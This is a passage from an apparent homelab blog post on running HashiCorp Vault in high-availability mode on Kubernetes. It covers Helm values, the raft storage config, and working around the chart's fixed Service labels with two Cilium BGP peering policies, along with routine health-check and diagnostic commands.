</span></span><span style="display:flex;"><span>    <span style="color:#f92672">active</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">standby</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;LoadBalancer&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">externalTrafficPolicy</span>: <span style="color:#e6db74">&#34;Local&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#ae81ff">newvault.example.com</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">io.cilium/lb-ipam-ips</span>: <span style="color:#ae81ff">300.300.300.12</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">includeConfigAnnotation</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dataStorage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">size</span>: <span style="color:#e6db74">&#34;1Gi&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">auditStorage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dev</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraVolumes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">type</span>: <span style="color:#ae81ff">secret</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">vault-tls-certs</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraEnvironmentVars</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">VAULT_CACERT</span>: <span style="color:#e6db74">&#34;/vault/userconfig/vault-tls-certs/issuing_ca&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">standalone</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ha</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">raft</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">setNodeId</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">config</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        cluster_name = &#34;vault-k8s&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        ui = false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        disable_mlock = false
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        listener &#34;tcp&#34; {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          address = &#34;[::]:8200&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          cluster_address = &#34;[::]:8201&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          tls_cert_file = &#34;/vault/userconfig/vault-tls-certs/certificate&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          tls_key_file  = &#34;/vault/userconfig/vault-tls-certs/private_key&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        storage &#34;raft&#34; {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          path = &#34;/vault/data&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          retry_join {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            leader_api_addr = &#34;https://vault-0.vault-internal:8200&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            leader_ca_cert_file = &#34;/vault/userconfig/vault-tls-certs/issuing_ca&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          retry_join {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            leader_api_addr = &#34;https://vault-1.vault-internal:8200&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            leader_ca_cert_file = &#34;/vault/userconfig/vault-tls-certs/issuing_ca&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          retry_join {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            leader_api_addr = &#34;https://vault-2.vault-internal:8200&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            leader_ca_cert_file = &#34;/vault/userconfig/vault-tls-certs/issuing_ca&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">          }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        service_registration &#34;kubernetes&#34; {}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">3</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ui</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">csi</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">serverTelemetry</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceMonitor</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>Let me explain. I&rsquo;m disabling the Ingress because I will make Vault accessible
via a LoadBalancer instead. There&rsquo;s no need to push it through Traefik; doing so
would just mean one more service that needs to be up
and running before Vault is accessible.</p>
<p>Next, the liveness probe. It needs to be configured so that Vault also returns
a <code>200</code> result when the Pod being probed is in
standby. See also <a href="https://developer.hashicorp.com/vault/api-docs/system/health">these docs</a>.
And while setting Vault up, before initializing the cluster, just do yourself
the favor and completely disable the probes, or at least increase the <code>initialDelaySeconds</code>,
to prevent restarts while you&rsquo;re still in the middle of initialization.</p>
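<p>As a quick sanity check, the health endpoint can also be queried by hand. A minimal
sketch, assuming the probe path uses the <code>standbyok</code> parameter so that standby
nodes answer with a <code>200</code> as well:</p>
<pre tabindex="0"><code># Sketch: query the health endpoint from inside a Vault Pod.
# With standbyok=true, standby nodes return 200 instead of the default 429.
curl -sk -o /dev/null -w &#34;%{http_code}\n&#34; \
  &#34;https://127.0.0.1:8200/v1/sys/health?standbyok=true&#34;
</code></pre>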
<p>Next, I&rsquo;m adding a toleration for <code>control-plane</code> nodes. This is mostly because
those are the only nodes with local storage, so they will be up first.</p>
<p>And then we come to the first problem with the chart, the service setup. In my
k8s cluster, I&rsquo;m using Cilium&rsquo;s BGP-based LoadBalancer support. And that requires
the Services Cilium looks at to have a specific, configurable label. But the
Vault Helm chart does not allow setting labels for the Services it creates.
Perhaps my use case is just really niche?
Anyway, I&rsquo;m enabling only the generic <code>vault</code> Service, setting it to LoadBalancer
and, importantly, setting the <code>externalTrafficPolicy</code> to <code>Local</code>. This means that
packets arriving for Vault will directly reach the node where the active Vault
Pod is running, instead of getting forwarded there by other nodes.
This is particularly important for Vault, because Vault can configure tokens
to be valid only when they&rsquo;re coming from certain IPs. This won&rsquo;t work when
the source IP looks like it&rsquo;s coming from another k8s node, instead of the actual
source host.
I&rsquo;m also setting a fixed IP to assign to the LoadBalancer, so I can easily set a
few choice firewall rules for access to that LoadBalancer.</p>
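<p>Once deployed, this can be verified on the resulting Service. A small sketch, assuming
the chart is installed in the <code>vault</code> namespace and the Service is simply named
<code>vault</code>:</p>
<pre tabindex="0"><code># Sketch: confirm the traffic policy and the assigned LoadBalancer IP
kubectl -n vault get svc vault \
  -o jsonpath=&#39;{.spec.externalTrafficPolicy}{&#34; &#34;}{.status.loadBalancer.ingress[0].ip}{&#34;\n&#34;}&#39;
</code></pre>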
<p>After the Service configs follows the HA configuration. In this config, there can
be multiple Vault servers, continuously exchanging data. When the currently active
server goes down, another one can take over, and the previous leader goes into
the standby pool once it&rsquo;s back.
Note that this is a high availability setup, not a load balancing setup. When
a request reaches a standby server, it is forwarded to the current active server.
The standby server never answers any requests, besides those to the health
endpoint, of course.
In my case, the HA config mostly consists of a config snippet for the Vault
config file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-hcl" data-lang="hcl"><span style="display:flex;"><span>cluster_name <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;vault-k8s&#34;</span>
</span></span><span style="display:flex;"><span>ui <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>disable_mlock <span style="color:#f92672">=</span> <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">listener</span> <span style="color:#e6db74">&#34;tcp&#34;</span> {
</span></span><span style="display:flex;"><span>  address <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;[::]:8200&#34;</span>
</span></span><span style="display:flex;"><span>  cluster_address <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;[::]:8201&#34;</span>
</span></span><span style="display:flex;"><span>  tls_cert_file <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/vault/userconfig/vault-tls-certs/certificate&#34;</span>
</span></span><span style="display:flex;"><span>  tls_key_file  <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/vault/userconfig/vault-tls-certs/private_key&#34;</span>
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">storage</span> <span style="color:#e6db74">&#34;raft&#34;</span> {
</span></span><span style="display:flex;"><span>  path <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/vault/data&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">retry_join</span> {
</span></span><span style="display:flex;"><span>    leader_api_addr <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://vault-0.vault-internal:8200&#34;</span>
</span></span><span style="display:flex;"><span>    leader_ca_cert_file <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/vault/userconfig/vault-tls-certs/issuing_ca&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">retry_join</span> {
</span></span><span style="display:flex;"><span>    leader_api_addr <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://vault-1.vault-internal:8200&#34;</span>
</span></span><span style="display:flex;"><span>    leader_ca_cert_file <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/vault/userconfig/vault-tls-certs/issuing_ca&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>  <span style="color:#66d9ef">retry_join</span> {
</span></span><span style="display:flex;"><span>    leader_api_addr <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;https://vault-2.vault-internal:8200&#34;</span>
</span></span><span style="display:flex;"><span>    leader_ca_cert_file <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;/vault/userconfig/vault-tls-certs/issuing_ca&#34;</span>
</span></span><span style="display:flex;"><span>  }
</span></span><span style="display:flex;"><span>}
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">service_registration</span> <span style="color:#e6db74">&#34;kubernetes&#34;</span> {}
</span></span></code></pre></div><p>Most interesting here is the <code>retry_join</code> configuration, which needs to point to
the CA that signed the TLS cert configured in the <code>listener</code> stanza. I will explain
this more deeply in the next section, where I set up the cert generation.</p>
<p>Once that Helm chart was deployed, a couple of things went wrong, leading to some
beautiful yak shaving.</p>
<h2 id="setting-up-the-ciliumbgppeeringpolicy">Setting up the CiliumBGPPeeringPolicy</h2>
<p>As I&rsquo;ve noted above, the labels of the main Vault Service cannot be changed.
Interestingly, the two other Services, for the active and standby servers, do have
the option of configuring their labels. But not the main Service.
Another issue: The type of the Services can only be set centrally, for all three
Services.</p>
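<p>To see what the chart actually produces, the labels on the generated Services can be
inspected directly; a small sketch, assuming everything lives in the <code>vault</code> namespace:</p>
<pre tabindex="0"><code># Sketch: list the Services created by the chart together with their labels
kubectl -n vault get svc --show-labels
</code></pre>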
<p>As you can read in a bit more detail <a href="https://blog.mei-home.net/posts/k8s-migration-2a-cilium-bgp/">here</a>,
I&rsquo;m using Cilium&rsquo;s BGP-based support for setting up LoadBalancer type services.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2alpha1&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumBGPPeeringPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">worker-node-bgp</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;worker&#34;</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">virtualRouters</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">localASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">exportPodCIDR</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">serviceSelector</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/public-service&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">neighbors</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">peerAddress</span>: <span style="color:#e6db74">&#39;300.300.300.405/32&#39;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">peerASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">eBGPMultihopTTL</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">connectRetryTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">holdTimeSeconds</span>: <span style="color:#ae81ff">90</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">keepAliveTimeSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">gracefulRestart</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">restartTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span></code></pre></div><p>The main problem here is the <code>spec.virtualRouters[0].serviceSelector</code>, as it
only allows matching on labels - and I cannot influence the labels set on the
Vault Service. I then took a very close look at the Cilium docs and found
that the selector can also match on the Service name and namespace. So I
tried extending the above config like this, adding another entry in the
<code>virtualRouters</code> list:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2alpha1&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumBGPPeeringPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">worker-node-bgp</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;worker&#34;</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">virtualRouters</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">localASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">exportPodCIDR</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">serviceSelector</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/public-service&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">neighbors</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">peerAddress</span>: <span style="color:#e6db74">&#39;300.300.300.405/32&#39;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">peerASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">eBGPMultihopTTL</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">connectRetryTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">holdTimeSeconds</span>: <span style="color:#ae81ff">90</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">keepAliveTimeSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">gracefulRestart</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">restartTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">localASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">exportPodCIDR</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">serviceSelector</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;io.kubernetes.service.name&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#e6db74">&#34;vault&#34;</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;io.kubernetes.service.namespace&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#e6db74">&#34;vault&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">neighbors</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">peerAddress</span>: <span style="color:#e6db74">&#39;300.300.300.405/32&#39;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">peerASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">eBGPMultihopTTL</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">connectRetryTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">holdTimeSeconds</span>: <span style="color:#ae81ff">90</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">keepAliveTimeSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">gracefulRestart</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">restartTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span></code></pre></div><p>But this did not work at all. Cilium announced either only the Services which
matched the first <code>serviceSelector</code> or the ones matching the second, but never
both. When debugging this issue, you can use <code>cilium bgp routes</code> to show which
routes Cilium advertises to its neighbors.</p>
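<p>For reference, this is roughly what that debugging looked like; a sketch, assuming the
<code>cilium</code> CLI is installed on the machine running <code>kubectl</code>:</p>
<pre tabindex="0"><code># Sketch: check the BGP sessions and which routes actually get advertised
cilium bgp peers
cilium bgp routes advertised ipv4 unicast
</code></pre>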
<p>What did end up working was introducing two peering policies. The sets of hosts they
apply to also seem to need to be disjoint, or it again won&rsquo;t work.
I&rsquo;ve got it configured like this now:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2alpha1&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumBGPPeeringPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">worker-node-bgp</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;worker&#34;</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;ceph&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">virtualRouters</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">localASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">exportPodCIDR</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">serviceSelector</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/public-service&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">neighbors</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">peerAddress</span>: <span style="color:#e6db74">&#39;300.300.300.405/32&#39;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">peerASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">eBGPMultihopTTL</span>: <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">connectRetryTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">holdTimeSeconds</span>: <span style="color:#ae81ff">90</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">keepAliveTimeSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">gracefulRestart</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">restartTimeSeconds</span>: <span style="color:#ae81ff">120</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2alpha1&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumBGPPeeringPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">controller-node-bgp</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">kube-system</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;homelab/role&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;controller&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">virtualRouters</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">localASN</span>: <span style="color:#ae81ff">64555</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">exportPodCIDR</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">serviceSelector</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">matchExpressions</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;io.kubernetes.service.name&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#e6db74">&#34;vault&#34;</span>
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">key</span>: <span style="color:#e6db74">&#34;io.kubernetes.service.namespace&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">In</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>              - <span style="color:#e6db74">&#34;vault&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">neighbors</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">peerAddress</span>: <span style="color:#e6db74">&#39;300.300.300.405/32&#39;</span>
